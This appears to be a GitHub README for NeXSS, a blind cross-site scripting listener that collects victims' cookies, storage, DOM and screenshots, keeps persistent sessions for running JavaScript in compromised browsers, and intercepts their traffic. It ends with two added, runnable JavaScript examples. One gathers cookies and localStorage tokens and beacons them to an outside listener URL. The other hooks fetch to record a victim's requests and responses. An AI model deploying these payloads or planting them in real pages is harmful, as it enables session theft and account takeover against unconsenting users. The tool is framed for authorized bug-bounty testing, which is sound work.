Repository: https://github.com/mastomii/nexss (GitHub, TypeScript)
Homepage: https://nexss.pages.dev
Topics: bugbounty, bughunting, cybersecurity, javascript, xss
Stars: 25, forks: 3, created 2025-12-24, last push 2026-01-13

<p align="center">
  <img src="public/nexss-logo-horizontal.png" alt="NeXSS Logo" width="250">
</p>

<p align="center">
  <strong>Lightweight Blind XSS Listener</strong>
</p>

<p align="center">
  <a href="#features">Features</a> •
  <a href="#installation">Installation</a> •
  <a href="#usage">Usage</a> •
  <a href="#configuration">Configuration</a>
</p>

<p align="center">
  <a href="https://vercel.com/new/clone?repository-url=https://github.com/mastomii/nexss">
    <img src="https://img.shields.io/badge/Deploy-Vercel-000000?style=for-the-badge&logo=vercel&logoColor=white" alt="Deploy with Vercel">
  </a>
  <a href="https://neon.tech">
    <img src="https://img.shields.io/badge/Database-Neon-00e599?style=for-the-badge&logo=postgresql&logoColor=white" alt="Get Neon Database">
  </a>
  <a href="https://dash.cloudflare.com/sign-up/r2">
    <img src="https://img.shields.io/badge/Storage-Cloudflare%20R2-f38020?style=for-the-badge&logo=cloudflare&logoColor=white" alt="Get Cloudflare R2">
  </a>
</p>

---

## Description

**NeXSS** is a modern, self-hosted Blind XSS (Cross-Site Scripting) hunter and callback listener built with Next.js. It helps security researchers and penetration testers discover and validate blind XSS vulnerabilities by capturing detailed information when payloads execute on target systems.

When your XSS payload triggers on a vulnerable application, NeXSS captures comprehensive data including cookies, DOM content, screenshots, local/session storage, and more — all delivered to your dashboard in real-time with optional Telegram notifications.

<p align="center">
  <img src="images/nexss-dashboard.png" alt="NeXSS Dashboard" width="100%">
  <br>
  <em>Dashboard with real-time statistics and recent reports</em>
</p>

## Features

| Feature | Description |
|---------|-------------|
| Blind XSS Detection | Captures data automatically when a payload executes in a victim's browser |
| Screenshot Capture | Renders a screenshot of the vulnerable page with html2canvas |
| Cookie Extraction | Captures every cookie readable from JavaScript (`HttpOnly` cookies are not) |
| DOM Capture | Stores the full HTML content of the affected page |
| Storage Extraction | Captures localStorage and sessionStorage data |
| Request Details | Logs URL, origin, referer, user-agent, and IP address |
| Persistent Sessions | Keeps a connection to compromised browsers for JavaScript command execution |
| **Traffic Interception** | **NEW** - Observes HTTP requests and responses made within the victim's browser session |
| AES-256 Encryption | Encrypts the command channel of persistent sessions (HTTPS targets only) |
| Telegram Notifications | Real-time alerts with screenshots when an XSS payload triggers |
| Object Storage | Stores screenshots in S3, MinIO, or Cloudflare R2 |
| JWT Authentication | JWT-based login sessions for the dashboard |
| Docker Ready | Deployment with Docker Compose |

## Installation

### Prerequisites
- Docker & Docker Compose (recommended)
- Or: Node.js 18+ and PostgreSQL 15+

### Free Cloud Deployment

Deploy NeXSS for free using these services:

| Service | Purpose | Free Tier |
|---------|---------|-----------|
| [Vercel](https://vercel.com) | Next.js Hosting | Unlimited projects |
| [NeonDB](https://neon.tech) | PostgreSQL Database | 0.5 GB storage |
| [Cloudflare R2](https://cloudflare.com/r2) | Object Storage | 10 GB storage |

### Quick Start with Docker

```bash
# Clone the repository
git clone https://github.com/mastomii/nexss.git
cd nexss

# Create the environment file
cp .env.example .env
```

Edit `.env` before the first start. The PostgreSQL container initialises its data volume with `POSTGRES_PASSWORD` on its first run, and the JWT and NextAuth secrets must exist when the app boots:

```env
# Database
DATABASE_URL=postgresql://nexss:your_secure_password@db:5432/nexss
POSTGRES_USER=nexss
POSTGRES_PASSWORD=your_secure_password
POSTGRES_DB=nexss

# Authentication (generate each with: openssl rand -hex 32)
JWT_SECRET=your_jwt_secret_here
NEXTAUTH_SECRET=your_nextauth_secret_here
NEXTAUTH_URL=http://localhost:3000

# Public URL for payload callbacks (must be reachable from the target's browser)
NEXT_PUBLIC_APP_URL=https://your-nexss-domain.com
```

Then start the stack:

```bash
docker compose up -d
```

Access the dashboard at `http://localhost:3000`

| | |
|---|---|
| Username | `admin` |
| Password | `admin123` |

> **Important:** Change the default password immediately after first login, and before the listener is reachable from the internet. The dashboard stores captured cookies and session tokens, so it is a target in its own right.

### Manual Installation

```bash
# Clone and install
git clone https://github.com/mastomii/nexss.git
cd nexss
npm install

# Setup database
psql -U postgres -c "CREATE DATABASE nexss;"
psql -U postgres -d nexss -f init.sql

# Configure and run
cp .env.example .env.local
npm run build
npm start
```

## Usage

### XSS Payloads

Configure your payloads from the Payloads page. Multiple payload formats are available:

<p align="center">
  <img src="images/nexss-payloads.png" alt="Payload Configuration" width="100%">
  <br>
  <em>Payload configuration with multiple injection formats</em>
</p>

Basic script tag injection (the listener serves the collector script from its root URL):

```html
<script src="https://your-nexss-domain.com/"></script>
```

### Viewing Reports

All captured XSS triggers are displayed in the Reports page with filtering and search:

<p align="center">
  <img src="images/nexss-reports.png" alt="Reports List" width="100%">
  <br>
  <em>Reports list with timestamps and victim information</em>
</p>

Click on any report to view detailed information:

<p align="center">
  <img src="images/nexss-report-details.png" alt="Report Details" width="100%">
  <br>
  <em>Detailed report view with screenshot, cookies, DOM, and storage data</em>
</p>

### Persistent Sessions

Enable persistent mode to maintain a connection with compromised browsers. This allows you to:

- Execute JavaScript commands in the victim's browser
- Retrieve additional data on demand
- Perform actions as the victim user

<p align="center">
  <img src="images/nexss-persistent-mode.png" alt="Persistent Mode" width="100%">
  <br>
  <em>Remote command execution on compromised browser sessions</em>
</p>

> **Note:** AES encryption for persistent sessions requires the target page to be served over HTTPS: the Web Crypto API (`crypto.subtle`) is only exposed in secure contexts. On plain-HTTP targets, commands travel in the clear.

### Traffic Interception (NEW)

**Traffic Interception** allows you to observe HTTP requests and responses happening within the victim's browser session. This feature provides visibility into API calls, form submissions, and navigation events.

<p align="left">
  <img src="https://github.com/mastomii/nexss/blob/main/images/nexss-traffic-interception-1.png?raw=true" alt="NeXSS Traffic Interception" width="800">
</p>

<p align="left">
  <img src="https://github.com/mastomii/nexss/blob/main/images/nexss-traffic-interception-2.png?raw=true" alt="NeXSS Traffic Interception" width="800">
</p>

<p align="left">
  <img src="https://github.com/mastomii/nexss/blob/main/images/nexss-traffic-interception-3.png?raw=true" alt="NeXSS Traffic Interception" width="800">
</p>

#### What It Captures

| Type | Description |
|------|-------------|
| `fetch` | Fetch API request + response (combined) |
| `xhr` | XMLHttpRequest + response (combined) |
| `form` | Form submission request data |
| `navigation` | Page navigation events |

#### Key Features

- **Unified Request/Response Capture** - Each traffic entry contains both request and response data
- **Complete HTTP Headers** - Reconstructs the headers page script cannot observe directly (Host, User-Agent, Accept, etc.) by inferring what the browser sends; entries are therefore a reconstruction, not a byte-exact copy of the wire request
- **Raw HTTP Format** - Easy copy-paste to tools like Burp Suite
- **Real-time Session Status** - Connected/Disconnected/Terminated states
- **Color-coded UI** - Methods (GET=green, POST=amber, etc.) and status codes (2xx=green, 4xx+=red)
- **Pagination** - 20 items per page for large traffic volumes
- **One-click Copy** - Copy URLs, full requests, and full responses

#### How to Enable

1. Go to **Settings** → **XSS Payload Settings**
2. Enable **Persistent Mode**
3. Enable **Advanced Persistent Mode (Experimental)**
4. *(Optional)* Generate an **AES-256 encryption key** for encrypted communication

#### Known Limitations

- **Race Condition** - Requests fired before the hooks are installed (for example, before DOM ready) are not captured
- **HttpOnly Cookies** - Cannot be read from JavaScript, so they never appear in captured data
- **Cross-Origin** - Response bodies of cross-origin requests are only readable when the target sends permissive CORS headers; otherwise the response is opaque to script
- **HTTPS Required** - AES-256 encryption only works on HTTPS targets, because the Web Crypto API is only exposed in secure contexts
- **Body Size Limits** - Request and response bodies are truncated to 10KB

> **Note:** Traffic Interception is marked as **Experimental**. This is application-layer observation only, not network-level packet capture.

## Configuration

### Environment Variables

| Variable | Description | Default |
|----------|-------------|---------|
| `DATABASE_URL` | PostgreSQL connection string | Required |
| `JWT_SECRET` | Secret for JWT signing | Required |
| `NEXTAUTH_SECRET` | NextAuth.js secret | Required |
| `NEXTAUTH_URL` | Application base URL | `http://localhost:3000` |
| `NEXT_PUBLIC_APP_URL` | Public URL for payload callbacks | Uses request host |
| `NODE_ENV` | Environment mode | `production` |

### Object Storage

Store screenshots externally using S3-compatible storage:

<p align="center">
  <img src="images/nexss-object-storage.png" alt="Object Storage Settings" width="100%">
  <br>
  <em>Object storage configuration with S3, MinIO, or Cloudflare R2</em>
</p>

Supported providers:
- AWS S3
- MinIO
- Cloudflare R2

### Telegram Notifications

Get real-time alerts when XSS payloads trigger:

<p align="center">
  <img src="images/nexss-telegram-notif.png" alt="Telegram Notification" width="100%">
  <br>
  <em>Telegram notification with screenshot preview</em>
</p>

Setup:
1. Create a bot via [@BotFather](https://t.me/BotFather)
2. Go to **Settings** > **Telegram Notifications**
3. Enter your bot token
4. Send `/start` to your bot
5. Click "Get Chat ID" to auto-detect
6. Send a test message to verify

## Contributing

Contributions are welcome. Please feel free to submit a Pull Request.

## License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

## Disclaimer

This tool is intended for **authorized security testing only**. Only use NeXSS against systems you have explicit permission to test. Unauthorized access to computer systems is illegal. The developers assume no liability for misuse of this software.
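The `<script src>` payload in the Usage section only loads a script from the listener; what that script does once it runs in the victim's page is the part a tester needs to understand. The block below is an added example, not NeXSS's own payload script: it gathers the same classes of data the Features table lists (cookies, DOM, storage, request details) from an explicitly passed page context and ships them to an assumed `/api/report` endpoint, preferring `navigator.sendBeacon` and falling back to a `no-cors` fetch. The page context, the endpoint path and the JSON field names are assumptions, and the 10KB cap mirrors the body limit stated under Known Limitations.

```javascript
// Added example (not NeXSS's own payload script): what a blind XSS callback
// collects once it runs in the victim's page and how it ships the result home.
// The listener path /api/report and the JSON field names are assumptions.
const MAX_DOM = 10 * 1024; // assumed cap, mirroring the 10KB body limit the README states

// Keep reports bounded; a huge page would otherwise stall or exceed beacon limits.
function truncate(str, max = MAX_DOM) {
  if (typeof str !== 'string') return '';
  return str.length > max ? str.slice(0, max) + `...[truncated ${str.length - max} chars]` : str;
}

// Copy a Web Storage object (localStorage / sessionStorage) into a plain object.
function dumpStorage(storage) {
  const out = {};
  if (!storage) return out;
  for (let i = 0; i < storage.length; i++) {
    const key = storage.key(i);
    out[key] = storage.getItem(key);
  }
  return out;
}

// Build the report from an explicit page context (document, location, ...)
// instead of globals, so the same function also runs in Node for testing.
function collectReport(ctx) {
  const { document, location, navigator } = ctx;
  return {
    url: location.href,
    origin: location.origin,
    referrer: document.referrer || '',
    userAgent: navigator.userAgent,
    cookies: document.cookie,                 // HttpOnly cookies are never visible here
    dom: truncate(document.documentElement.outerHTML),
    localStorage: dumpStorage(ctx.localStorage),
    sessionStorage: dumpStorage(ctx.sessionStorage),
    capturedAt: new Date().toISOString(),
  };
}

// Deliver the report. sendBeacon is queued by the browser and survives page
// unload; a string body goes out as text/plain, which needs no CORS preflight.
// Fall back to a no-cors fetch, whose opaque response we never need to read.
function deliver(report, listenerUrl, ctx) {
  const body = JSON.stringify(report);
  const nav = ctx.navigator;
  if (nav && typeof nav.sendBeacon === 'function' && nav.sendBeacon(listenerUrl, body)) {
    return 'beacon';
  }
  ctx.fetch(listenerUrl, { method: 'POST', mode: 'no-cors', body, keepalive: true });
  return 'fetch';
}

// Constructed page context standing in for a real browser so the example runs offline.
function makeFakeStorage(entries) {
  const keys = Object.keys(entries);
  return { length: keys.length, key: (i) => keys[i], getItem: (k) => entries[k] };
}
function makeFakePage(sent) {
  return {
    document: {
      cookie: 'session=abc123; theme=dark',
      referrer: 'https://app.example/login',
      documentElement: { outerHTML: '<html><body>' + 'admin panel '.repeat(1000) + '</body></html>' },
    },
    location: { href: 'https://app.example/admin?id=7', origin: 'https://app.example' },
    navigator: {
      userAgent: 'ExampleBrowser/1.0',
      sendBeacon: (url, body) => { sent.push({ url, body }); return true; },
    },
    localStorage: makeFakeStorage({ token: 'eyJhbGciOi.example' }),
    sessionStorage: makeFakeStorage({}),
    fetch: () => Promise.resolve(),
  };
}

function demo(listenerUrl = 'https://your-nexss-domain.com/api/report') {
  const sent = [];
  const page = makeFakePage(sent);
  const report = collectReport(page);
  const how = deliver(report, listenerUrl, page);
  return { report, how, sent };
}

const result = demo();
console.log(result.how, result.sent[0].url, 'dom bytes:', result.report.dom.length);
```

In a real payload the context is simply `window` (`document`, `location`, `navigator`, `localStorage`, `sessionStorage`, `fetch`), and the listener, not the script, records the client IP and the `Referer` and `User-Agent` request headers of the callback itself.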
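Traffic Interception, as the Known Limitations section makes clear, works by wrapping the page's own `fetch` and `XMLHttpRequest` from the injected script rather than by sniffing the network. The block below is an added example, not the project's interception code: a `fetch` wrapper that records each call as a combined request/response entry in raw HTTP form for pasting into Burp Suite, infers the headers page script cannot observe, truncates bodies at 10KB, and records cross-origin opaque responses as unreadable instead of breaking the page's request. `page`, `fakeApi`, the entry shape and the header inference are assumptions; it runs offline in Node 18+, which provides the global `Response` and `Headers` classes.

```javascript
// Added example (not NeXSS's own interception code): hook fetch() from inside
// the page so each call is logged as a combined request/response entry in raw
// HTTP form. The entry shape, the inferred headers and the 10KB cap are
// assumptions modelled on the limitations the README lists.
const BODY_LIMIT = 10 * 1024;

function truncateBody(text) {
  if (text.length <= BODY_LIMIT) return text;
  return text.slice(0, BODY_LIMIT) + `\n...[truncated ${text.length - BODY_LIMIT} chars]`;
}

// Page script cannot see the headers the browser adds on the wire (Host,
// User-Agent, Origin, ...), so fill in what the browser would send. Treat the
// result as a reconstruction, not a byte-exact capture.
function inferHeaders(url, explicit, page) {
  const h = new Headers(explicit);
  if (!h.has('host')) h.set('host', url.host);
  if (!h.has('user-agent')) h.set('user-agent', page.userAgent);
  if (!h.has('accept')) h.set('accept', '*/*');
  if (!h.has('origin') && url.origin !== page.origin) h.set('origin', page.origin);
  return h;
}

function rawRequest(method, url, headers, body) {
  const lines = [`${method} ${url.pathname}${url.search} HTTP/1.1`];
  for (const [name, value] of headers) lines.push(`${name}: ${value}`);
  return lines.join('\r\n') + '\r\n\r\n' + body;
}

function rawResponse(res, body) {
  const lines = [`HTTP/1.1 ${res.status} ${res.statusText}`.trimEnd()];
  for (const [name, value] of res.headers) lines.push(`${name}: ${value}`);
  return lines.join('\r\n') + '\r\n\r\n' + body;
}

// Wrap a fetch implementation. In a browser: window.fetch = hookFetch(window.fetch, page).wrapped
// The real call is never blocked or altered; logging failures are swallowed.
function hookFetch(fetchImpl, page) {
  const log = [];
  const wrapped = async function (input, init = {}) {
    const entry = { type: 'fetch' };
    try {
      const url = new URL(typeof input === 'string' ? input : input.url, page.baseUrl);
      const method = (init.method || (input && input.method) || 'GET').toUpperCase();
      const body = typeof init.body === 'string' ? init.body : '';
      Object.assign(entry, {
        method,
        url: url.href,
        request: rawRequest(method, url, inferHeaders(url, init.headers, page), truncateBody(body)),
      });
    } catch (_) { /* never break the page's request because of logging */ }
    const res = await fetchImpl(input, init);
    try {
      if (res.type === 'opaque') {
        // Cross-origin without CORS headers: status and body are hidden from script.
        Object.assign(entry, { status: 0, response: null, note: 'opaque cross-origin response' });
      } else {
        entry.status = res.status;
        const text = await res.clone().text(); // clone so the page still gets its body
        entry.response = rawResponse(res, truncateBody(text));
      }
    } catch (_) { entry.note = 'response not readable'; }
    log.push(entry);
    return res;
  };
  return { wrapped, log };
}

// Constructed stand-ins so the example runs offline (global Response/Headers, Node 18+).
const page = { baseUrl: 'https://app.example/', origin: 'https://app.example', userAgent: 'ExampleBrowser/1.0' };
const fakeApi = async () =>
  new Response('{"role":"admin"}', { status: 200, headers: { 'content-type': 'application/json' } });

async function demo() {
  const { wrapped, log } = hookFetch(fakeApi, page);
  const res = await wrapped('/api/me', {
    method: 'post',
    headers: { 'content-type': 'application/json' },
    body: '{"id":7}',
  });
  const pageSaw = await res.text();              // the page's own view of the body is intact
  return { entry: log[0], pageSaw };
}

demo().then(({ entry }) => console.log(entry.request + '\n\n' + entry.response));
```

The analogous XHR hook patches `XMLHttpRequest.prototype.open` and `send` and reads `responseText` in a `load` listener. The same race applies to both: any request issued before the wrapper is installed is simply missed, which is the "Race Condition" limitation above.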